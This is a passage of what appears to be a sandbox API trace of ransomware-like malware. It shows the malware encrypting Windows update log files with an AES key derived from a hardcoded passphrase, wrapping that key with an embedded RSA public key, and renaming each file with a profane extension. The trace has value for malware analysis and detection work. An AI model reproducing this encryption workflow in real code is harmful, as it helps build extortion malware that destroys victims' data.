(lpExistingFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.005.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.005.etl"), lpNewFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.005.etl.fuck" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.005.etl.fuck")) returned 0 [0238.432] CryptDestroyHash (hHash=0x2845de0) returned 1 [0238.432] CryptDestroyKey (hKey=0x2817298) returned 1 [0238.432] CryptReleaseContext (hProv=0x2880390, dwFlags=0x0) returned 1 [0238.432] FindNextFileA (in: hFindFile=0x27ea990, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.432] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f070 | out: lpSystemTimeAsFileTime=0x2b9f070) [0238.432] GetLastError () returned 0x5 [0238.432] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.006.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.006.etl")) returned 0x2020 [0238.432] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.006.etl", dwFileAttributes=0x80) returned 0 [0238.433] CreateFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.006.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.006.etl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.433] CreateFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.006.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.006.etl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0238.433] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.006.etl.gsg", dwFileAttributes=0x2) returned 1 [0238.434] CryptAcquireContextA (in: phProv=0x2b9e06c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e06c*=0x287fb10) returned 1 [0238.436] CryptCreateHash (in: hProv=0x287fb10, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e070 | out: phHash=0x2b9e070) returned 1 [0238.436] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.436] CryptHashData (hHash=0x2845de0, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.436] CryptDeriveKey (in: hProv=0x287fb10, Algid=0x6610, hBaseData=0x2845de0, dwFlags=0x1000000, phKey=0x2b9e05c | out: phKey=0x2b9e05c*=0x27eacd0) returned 1 [0238.436] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.436] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e078, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054 | out: pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054) returned 1 [0238.436] CryptAcquireContextA (in: phProv=0x2b9e068, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e068*=0x2880390) returned 1 [0238.436] CryptImportPublicKeyInfo (in: hCryptProv=0x2880390, dwCertEncodingType=0x1, pInfo=0x286a498*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286a4c8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286a4d0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e060 | out: phKey=0x2b9e060*=0x27ead50) returned 1 [0238.436] CryptEncrypt (in: hKey=0x27ead50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e050*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e050*=0x80) returned 1 [0238.436] CryptEncrypt (in: hKey=0x27ead50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x287fdb8*, pdwDataLen=0x2b9e064*=0x18, dwBufLen=0x80 | out: pbData=0x287fdb8*, pdwDataLen=0x2b9e064*=0x80) returned 1 [0238.437] WriteFile (in: hFile=0x5d10, lpBuffer=0x287fdb8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x287fdb8*, lpNumberOfBytesWritten=0x2b9e074*=0x80, lpOverlapped=0x0) returned 1 [0238.437] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9e074*=0x0, lpOverlapped=0x0) returned 0 [0238.437] CryptEncrypt (in: hKey=0x27eacd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x10) returned 1 [0238.437] WriteFile (in: hFile=0x5d10, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9e074*=0x10, lpOverlapped=0x0) returned 1 [0238.438] CloseHandle (hObject=0xffffffff) returned 1 [0238.438] CloseHandle (hObject=0x5d10) returned 1 [0238.438] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.006.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.006.etl.gsg"), lpNewFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.006.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.006.etl"), bFailIfExists=0) returned 0 [0238.442] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.006.etl", dwFileAttributes=0x2000) returned 0 [0238.442] DeleteFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.006.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.006.etl.gsg")) returned 1 [0238.443] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.006.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.006.etl"), lpNewFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.006.etl.fuck" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.006.etl.fuck")) returned 0 [0238.444] CryptDestroyHash (hHash=0x2845de0) returned 1 [0238.444] CryptDestroyKey (hKey=0x27eacd0) returned 1 [0238.444] CryptReleaseContext (hProv=0x287fb10, dwFlags=0x0) returned 1 [0238.444] FindNextFileA (in: hFindFile=0x27ea990, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.444] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f070 | out: lpSystemTimeAsFileTime=0x2b9f070) [0238.444] GetLastError () returned 0x5 [0238.444] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.007.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.007.etl")) returned 0x2020 [0238.444] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.007.etl", dwFileAttributes=0x80) returned 0 [0238.444] CreateFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.007.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.007.etl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.444] CreateFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.007.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.007.etl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0238.445] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.007.etl.gsg", dwFileAttributes=0x2) returned 1 [0238.445] CryptAcquireContextA (in: phProv=0x2b9e06c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e06c*=0x2880638) returned 1 [0238.447] CryptCreateHash (in: hProv=0x2880638, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e070 | out: phHash=0x2b9e070) returned 1 [0238.447] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.447] CryptHashData (hHash=0x2845de0, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.447] CryptDeriveKey (in: hProv=0x2880638, Algid=0x6610, hBaseData=0x2845de0, dwFlags=0x1000000, phKey=0x2b9e05c | out: phKey=0x2b9e05c*=0x2817298) returned 1 [0238.447] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.447] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e078, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054 | out: pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054) returned 1 [0238.447] CryptAcquireContextA (in: phProv=0x2b9e068, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e068*=0x28800e8) returned 1 [0238.448] CryptImportPublicKeyInfo (in: hCryptProv=0x28800e8, dwCertEncodingType=0x1, pInfo=0x286aff8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286b028*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286b030*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e060 | out: phKey=0x2b9e060*=0x27eacd0) returned 1 [0238.448] CryptEncrypt (in: hKey=0x27eacd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e050*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e050*=0x80) returned 1 [0238.448] CryptEncrypt (in: hKey=0x27eacd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2880170*, pdwDataLen=0x2b9e064*=0x18, dwBufLen=0x80 | out: pbData=0x2880170*, pdwDataLen=0x2b9e064*=0x80) returned 1 [0238.448] WriteFile (in: hFile=0x5d10, lpBuffer=0x2880170*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x2880170*, lpNumberOfBytesWritten=0x2b9e074*=0x80, lpOverlapped=0x0) returned 1 [0238.449] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9e074*=0x0, lpOverlapped=0x0) returned 0 [0238.449] CryptEncrypt (in: hKey=0x2817298, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x10) returned 1 [0238.449] WriteFile (in: hFile=0x5d10, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9e074*=0x10, lpOverlapped=0x0) returned 1 [0238.449] CloseHandle (hObject=0xffffffff) returned 1 [0238.449] CloseHandle (hObject=0x5d10) returned 1 [0238.450] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.007.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.007.etl.gsg"), lpNewFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.007.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.007.etl"), bFailIfExists=0) returned 0 [0238.453] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.007.etl", dwFileAttributes=0x2000) returned 0 [0238.453] DeleteFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.007.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.007.etl.gsg")) returned 1 [0238.454] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.007.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.007.etl"), lpNewFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.007.etl.fuck" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.007.etl.fuck")) returned 0 [0238.455] CryptDestroyHash (hHash=0x2845de0) returned 1 [0238.455] CryptDestroyKey (hKey=0x2817298) returned 1 [0238.455] CryptReleaseContext (hProv=0x2880638, dwFlags=0x0) returned 1 [0238.455] FindNextFileA (in: hFindFile=0x27ea990, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.455] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f070 | out: lpSystemTimeAsFileTime=0x2b9f070) [0238.455] GetLastError () returned 0x5 [0238.455] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.008.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.008.etl")) returned 0x2020 [0238.456] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.008.etl", dwFileAttributes=0x80) returned 0 [0238.457] CreateFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.008.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.008.etl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.457] CreateFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.008.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.008.etl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0238.457] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.008.etl.gsg", dwFileAttributes=0x2) returned 1 [0238.458] CryptAcquireContextA (in: phProv=0x2b9e06c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e06c*=0x28801f8) returned 1 [0238.461] CryptCreateHash (in: hProv=0x28801f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e070 | out: phHash=0x2b9e070) returned 1 [0238.461] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.461] CryptHashData (hHash=0x28467e0, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.461] CryptDeriveKey (in: hProv=0x28801f8, Algid=0x6610, hBaseData=0x28467e0, dwFlags=0x1000000, phKey=0x2b9e05c | out: phKey=0x2b9e05c*=0x2817298) returned 1 [0238.461] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.461] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e078, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054 | out: pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054) returned 1 [0238.461] CryptAcquireContextA (in: phProv=0x2b9e068, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e068*=0x287fc20) returned 1 [0238.461] CryptImportPublicKeyInfo (in: hCryptProv=0x287fc20, dwCertEncodingType=0x1, pInfo=0x286b678*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286b6a8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286b6b0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e060 | out: phKey=0x2b9e060*=0x282ddb8) returned 1 [0238.461] CryptEncrypt (in: hKey=0x282ddb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e050*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e050*=0x80) returned 1 [0238.462] CryptEncrypt (in: hKey=0x282ddb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28808e0*, pdwDataLen=0x2b9e064*=0x18, dwBufLen=0x80 | out: pbData=0x28808e0*, pdwDataLen=0x2b9e064*=0x80) returned 1 [0238.462] WriteFile (in: hFile=0x5d10, lpBuffer=0x28808e0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x28808e0*, lpNumberOfBytesWritten=0x2b9e074*=0x80, lpOverlapped=0x0) returned 1 [0238.463] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9e074*=0x0, lpOverlapped=0x0) returned 0 [0238.463] CryptEncrypt (in: hKey=0x2817298, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x10) returned 1 [0238.463] WriteFile (in: hFile=0x5d10, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9e074*=0x10, lpOverlapped=0x0) returned 1 [0238.463] CloseHandle (hObject=0xffffffff) returned 1 [0238.463] CloseHandle (hObject=0x5d10) returned 1 [0238.472] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.008.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.008.etl.gsg"), lpNewFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.008.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.008.etl"), bFailIfExists=0) returned 0 [0238.477] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.008.etl", dwFileAttributes=0x2000) returned 0 [0238.477] DeleteFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.008.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.008.etl.gsg")) returned 1 [0238.478] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.008.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.008.etl"), lpNewFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.008.etl.fuck" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.008.etl.fuck")) returned 0 [0238.479] CryptDestroyHash (hHash=0x28467e0) returned 1 [0238.479] CryptDestroyKey (hKey=0x2817298) returned 1 [0238.479] CryptReleaseContext (hProv=0x28801f8, dwFlags=0x0) returned 1 [0238.479] FindNextFileA (in: hFindFile=0x27ea990, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.479] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f070 | out: lpSystemTimeAsFileTime=0x2b9f070) [0238.479] GetLastError () returned 0x5 [0238.479] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.009.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.009.etl")) returned 0x2020 [0238.480] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.009.etl", dwFileAttributes=0x80) returned 0 [0238.480] CreateFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.009.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.009.etl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.480] CreateFileA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.009.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.009.etl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0238.481] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.009.etl.gsg", dwFileAttributes=0x2) returned 1 [0238.481] CryptAcquireContextA (in: phProv=0x2b9e06c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e06c*=0x28801f8) returned 1 [0238.483] CryptCreateHash (in: hProv=0x28801f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e070 | out: phHash=0x2b9e070) returned 1 [0238.484] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.484] CryptHashData (hHash=0x282dfb8, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.484] CryptDeriveKey (in: hProv=0x28801f8, Algid=0x6610, hBaseData=0x282dfb8, dwFlags=0x1000000, phKey=0x2b9e05c | out: phKey=0x2b9e05c*=0x282ddf8) returned 1 [0238.484] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.484] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e078, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054 | out: pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054) returned 1 [0238.484] CryptAcquireContextA (in: phProv=0x2b9e068, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e068*=0x287fa88) returned 1 [0238.484] CryptImportPublicKeyInfo (in: hCryptProv=0x287fa88, dwCertEncodingType=0x1, pInfo=0x286a568*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286a598*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286a5a0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e060 | out: phKey=0x2b9e060*=0x282df38) returned 1 [0238.484] CryptEncrypt (in: hKey=0x282df38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e050*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e050*=0x80) returned 1 [0238.484] CryptEncrypt (in: hKey=0x282df38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2880280*, pdwDataLen=0x2b9e064*=0x18, dwBufLen=0x80 | out: pbData=0x2880280*, pdwDataLen=0x2b9e064*=0x80) returned 1 [0238.485] WriteFile (in: hFile=0x5d10, lpBuffer=0x2880280*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x2880280*, lpNumberOfBytesWritten=0x2b9e074*=0x80, lpOverlapped=0x0) returned 1 [0238.486] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9e074*=0x0, lpOverlapped=0x0) returned 0 [0238.486] CryptEncrypt (in: hKey=0x282ddf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x10) returned 1 [0238.486] WriteFile (in: hFile=0x5d10, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9e074*=0x10, lpOverlapped=0x0) returned 1 [0238.486] CloseHandle (hObject=0xffffffff) returned 1 [0238.486] CloseHandle (hObject=0x5d10) returned 1 [0238.487] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.009.etl.gsg" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.009.etl.gsg"), lpNewFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.009.etl" (normalized: "c:\\programdata\\usoshared\\logs\\updatesessionorchestration.009.etl"), bFailIfExists=0) returned 0 [0238.492] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.009.etl", dwFileAttributes=0x2000) returned 0 [0238.493] DeleteFileA 